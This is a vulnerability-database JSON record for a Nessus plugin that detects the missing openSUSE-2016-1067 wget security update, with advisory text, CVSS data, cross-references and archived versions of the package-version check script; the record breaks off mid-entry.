{"id": "OPENSUSE-2016-1067.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : wget (openSUSE-2016-1067)", "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "published": "2016-09-12T00:00:00", "modified": "2020-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/93430", "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=984060", "https://bugzilla.opensuse.org/show_bug.cgi?id=937096", "https://bugzilla.opensuse.org/show_bug.cgi?id=958342"], "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "type": "nessus", "lastseen": "2020-01-01T00:27:32", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:wget-debuginfo", "p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debugsource"], "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 10, "enchantments": {"dependencies": {"modified": "2019-12-13T08:16:12", "references": [{"idList": ["OPENVAS:1361412562310871702", "OPENVAS:1361412562310808447", "OPENVAS:1361412562310120709", "OPENVAS:1361412562310869803", "OPENVAS:1361412562310808463", "OPENVAS:1361412562310106827", "OPENVAS:1361412562310130038", "OPENVAS:1361412562310842802", "OPENVAS:1361412562310808439", "OPENVAS:703578"], "type": "openvas"}, {"idList": ["CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99", "CFOUNDRY:7564F58510B8A05C74D232728F162219"], "type": "cloudfoundry"}, {"idList": ["GLSA-201610-11"], "type": "gentoo"}, {"idList": ["ALAS-2016-720"], "type": "amazon"}, {"idList": ["F5:K55181425", "SOL55181425"], "type": "f5"}, {"idList": ["1337DAY-ID-25433"], "type": "zdt"}, {"idList": ["ELSA-2016-2587"], "type": "oraclelinux"}, {"idList": ["EDB-ID:40064"], "type": "exploitdb"}, {"idList": ["SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"], "type": "suse"}, {"idList": ["CVE-2015-2059", "CVE-2016-4971"], "type": "cve"}, {"idList": ["6DF56C60-3738-11E6-A671-60A44CE6887B", "4CAF01E2-30E6-11E5-A4A5-002590263BF5"], "type": "freebsd"}, {"idList": ["FREEBSD_PKG_6DF56C60373811E6A67160A44CE6887B.NASL", "UBUNTU_USN-3012-1.NASL", "DEBIAN_DLA-536.NASL", "DEBIAN_DLA-277.NASL", "SUSE_SU-2016-2226-1.NASL", "FREEBSD_PKG_4CAF01E230E611E5A4A5002590263BF5.NASL", "GENTOO_GLSA-201610-11.NASL", "ORACLELINUX_ELSA-2016-2587.NASL", "DEBIAN_DSA-3578.NASL", "EULEROS_SA-2016-1064.NASL"], "type": "nessus"}, {"idList": ["USN-3068-1", "USN-3012-1"], "type": "ubuntu"}, {"idList": ["DEBIAN:DLA-536-1:51225", "DEBIAN:DLA-476-1:61871", "DEBIAN:DSA-3578-1:1FEE8", "DEBIAN:DLA-291-1:F7790", "DEBIAN:DLA-277-1:149FA"], "type": "debian"}, {"idList": ["ASA-201606-19"], "type": "archlinux"}, {"idList": ["CESA-2016:2587"], "type": "centos"}, {"idList": ["RHSA-2016:2587"], "type": "redhat"}, {"idList": ["SSA-2016-165-01"], "type": "slackware"}, {"idList": ["PACKETSTORM:137795"], "type": "packetstorm"}]}, "score": {"modified": "2019-12-13T08:16:12", "value": 6.9, "vector": "NONE"}}, "hash": "d9c9d975568311651bdbf49cccd9ba9767ba967a57af2285ca6e5888f3e6e473", "hashmap": [{"hash": "78380ff63862ab0298c0bd584719b6b6", "key": "references"}, {"hash": "e80788aa1c1ddb449fbf74c19c5ad577", "key": "href"}, {"hash": "85a1dbd2589f6cc3f4433a53e1ea788c", "key": "sourceData"}, {"hash": "450c22ac790da2dd73385bc0def48eb3", "key": "title"}, {"hash": "6fd51175a5b1f1715711c3f644f87ce0", "key": "description"}, {"hash": "dda28ffbd67dd0668e5ed3862dff8dca", "key": "cpe"}, {"hash": "b7beaf9d124542f914ef08e608facdab", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "bf075a2e5050f9fb0e8c0726f9a6e082", "key": "pluginID"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "782af1722d6c251ca784cd8cb6206941", "key": "published"}, {"hash": "5a7504dfe859a7ccbaf560628f6442ad", "key": "modified"}, {"hash": "c17b1ab6089bc563ae8f428088d54fe7", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/93430", "id": "OPENSUSE-2016-1067.NASL", "lastseen": "2019-12-13T08:16:12", "modified": "2019-12-02T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "93430", "published": "2016-09-12T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=984060", "https://bugzilla.opensuse.org/show_bug.cgi?id=937096", "https://bugzilla.opensuse.org/show_bug.cgi?id=958342"], "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93430);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2019/04/11 17:23:07\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-1067)\");\n script_summary(english:\"Check for the openSUSE-2016-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debuginfo-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debugsource-1.14-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "title": "openSUSE Security Update : wget (openSUSE-2016-1067)", "type": "nessus", "viewCount": 3}, "differentElements": ["modified"], "edition": 10, "lastseen": "2019-12-13T08:16:12"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:wget-debuginfo", "p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debugsource"], "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-10-28T20:47:46", "references": [{"idList": ["CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99", "CFOUNDRY:7564F58510B8A05C74D232728F162219"], "type": "cloudfoundry"}, {"idList": ["GLSA-201610-11"], "type": "gentoo"}, {"idList": ["ALAS-2016-720"], "type": "amazon"}, {"idList": ["F5:K55181425", "SOL55181425"], "type": "f5"}, {"idList": ["1337DAY-ID-25433"], "type": "zdt"}, {"idList": ["ELSA-2016-2587"], "type": "oraclelinux"}, {"idList": ["EDB-ID:40064"], "type": "exploitdb"}, {"idList": ["SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"], "type": "suse"}, {"idList": ["CVE-2015-2059", "CVE-2016-4971"], "type": "cve"}, {"idList": ["6DF56C60-3738-11E6-A671-60A44CE6887B", "4CAF01E2-30E6-11E5-A4A5-002590263BF5"], "type": "freebsd"}, {"idList": ["OPENVAS:1361412562310871702", "OPENVAS:1361412562310869825", "OPENVAS:1361412562310703578", "OPENVAS:1361412562310869360", "OPENVAS:1361412562310869803", "OPENVAS:1361412562310106827", "OPENVAS:1361412562310130038", "OPENVAS:1361412562310842802", "OPENVAS:1361412562310808439", "OPENVAS:703578"], "type": "openvas"}, {"idList": ["USN-3068-1", "USN-3012-1"], "type": "ubuntu"}, {"idList": ["DEBIAN:DLA-536-1:51225", "DEBIAN:DLA-476-1:61871", "DEBIAN:DSA-3578-1:1FEE8", "DEBIAN:DLA-291-1:F7790", "DEBIAN:DLA-277-1:149FA"], "type": "debian"}, {"idList": ["ASA-201606-19"], "type": "archlinux"}, {"idList": ["CESA-2016:2587"], "type": "centos"}, {"idList": ["OPENSUSE-2016-973.NASL", "CENTOS_RHSA-2016-2587.NASL", "ALA_ALAS-2016-720.NASL", "SLACKWARE_SSA_2016-165-01.NASL", "FEDORA_2016-E14374472F.NASL", "REDHAT-RHSA-2016-2587.NASL", "SUSE_SU-2016-2226-1.NASL", "FREEBSD_PKG_4CAF01E230E611E5A4A5002590263BF5.NASL", "GENTOO_GLSA-201610-11.NASL", "SL_20161103_WGET_ON_SL7_X.NASL"], "type": "nessus"}, {"idList": ["RHSA-2016:2587"], "type": "redhat"}, {"idList": ["SSA-2016-165-01"], "type": "slackware"}, {"idList": ["PACKETSTORM:137795"], "type": "packetstorm"}]}, "score": {"modified": "2019-10-28T20:47:46", "value": 6.9, "vector": "NONE"}}, "hash": "d484c3de399a166d58f50a1605b47d3e624a4bbdc0d15f503e8de18db34c6767", "hashmap": [{"hash": "78380ff63862ab0298c0bd584719b6b6", "key": "references"}, {"hash": "e80788aa1c1ddb449fbf74c19c5ad577", "key": "href"}, {"hash": "85a1dbd2589f6cc3f4433a53e1ea788c", "key": "sourceData"}, {"hash": "450c22ac790da2dd73385bc0def48eb3", "key": "title"}, {"hash": "6fd51175a5b1f1715711c3f644f87ce0", "key": "description"}, {"hash": "dda28ffbd67dd0668e5ed3862dff8dca", "key": "cpe"}, {"hash": "b7beaf9d124542f914ef08e608facdab", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "bf075a2e5050f9fb0e8c0726f9a6e082", "key": "pluginID"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "782af1722d6c251ca784cd8cb6206941", "key": "published"}, {"hash": "c17b1ab6089bc563ae8f428088d54fe7", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/93430", "id": "OPENSUSE-2016-1067.NASL", "lastseen": "2019-10-28T20:47:46", "modified": "2019-10-02T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "93430", "published": "2016-09-12T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=984060", "https://bugzilla.opensuse.org/show_bug.cgi?id=937096", "https://bugzilla.opensuse.org/show_bug.cgi?id=958342"], "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93430);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2019/04/11 17:23:07\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-1067)\");\n script_summary(english:\"Check for the openSUSE-2016-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debuginfo-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debugsource-1.14-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "title": "openSUSE Security Update : wget (openSUSE-2016-1067)", "type": "nessus", "viewCount": 3}, "differentElements": ["modified"], "edition": 8, "lastseen": "2019-10-28T20:47:46"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:wget-debuginfo", "p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debugsource"], "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096, CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "70d7f9cd4bc4b95ba182456c3e1617d965f1cab03227c7756d59ecdfaf744740", "hashmap": [{"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9a127128ec69ac667e86e5f3c35491b8", "key": "href"}, {"hash": "78380ff63862ab0298c0bd584719b6b6", "key": "references"}, {"hash": "62e698d10394c057d4c04be48ade1a82", "key": "sourceData"}, {"hash": "450c22ac790da2dd73385bc0def48eb3", "key": "title"}, {"hash": "bcd8abde7f060a8789d08ba0ba73d345", "key": "modified"}, {"hash": "dda28ffbd67dd0668e5ed3862dff8dca", "key": "cpe"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "bf075a2e5050f9fb0e8c0726f9a6e082", "key": "pluginID"}, {"hash": "6bc146cd16afabe5f55b4706d32ba377", "key": "description"}, {"hash": "782af1722d6c251ca784cd8cb6206941", "key": "published"}, {"hash": "c17b1ab6089bc563ae8f428088d54fe7", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=93430", "id": "OPENSUSE-2016-1067.NASL", "lastseen": "2018-08-30T19:34:37", "modified": "2016-10-13T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "93430", "published": "2016-09-12T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=984060", "https://bugzilla.opensuse.org/show_bug.cgi?id=937096", "https://bugzilla.opensuse.org/show_bug.cgi?id=958342"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93430);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2016/10/13 14:27:27 $\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-1067)\");\n script_summary(english:\"Check for the openSUSE-2016-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debuginfo-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debugsource-1.14-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "title": "openSUSE Security Update : wget (openSUSE-2016-1067)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:34:37"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:wget-debuginfo", "p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debugsource"], "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-01-16T20:24:51", "references": [{"idList": ["CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99", "CFOUNDRY:7564F58510B8A05C74D232728F162219"], "type": "cloudfoundry"}, {"idList": ["FEDORA_2015-11621.NASL", "FEDORA_2016-2DB8CBC2FD.NASL", "CENTOS_RHSA-2016-2587.NASL", "DEBIAN_DLA-277.NASL", "OPENSUSE-2015-497.NASL", "SUSE_SU-2016-2226-1.NASL", "FREEBSD_PKG_4CAF01E230E611E5A4A5002590263BF5.NASL", "SL_20161103_WGET_ON_SL7_X.NASL", "ORACLELINUX_ELSA-2016-2587.NASL", "EULEROS_SA-2016-1064.NASL"], "type": "nessus"}, {"idList": ["GLSA-201610-11"], "type": "gentoo"}, {"idList": ["ALAS-2016-720"], "type": "amazon"}, {"idList": ["F5:K55181425", "SOL55181425"], "type": "f5"}, {"idList": ["1337DAY-ID-25433"], "type": "zdt"}, {"idList": ["ELSA-2016-2587"], "type": "oraclelinux"}, {"idList": ["EDB-ID:40064"], "type": 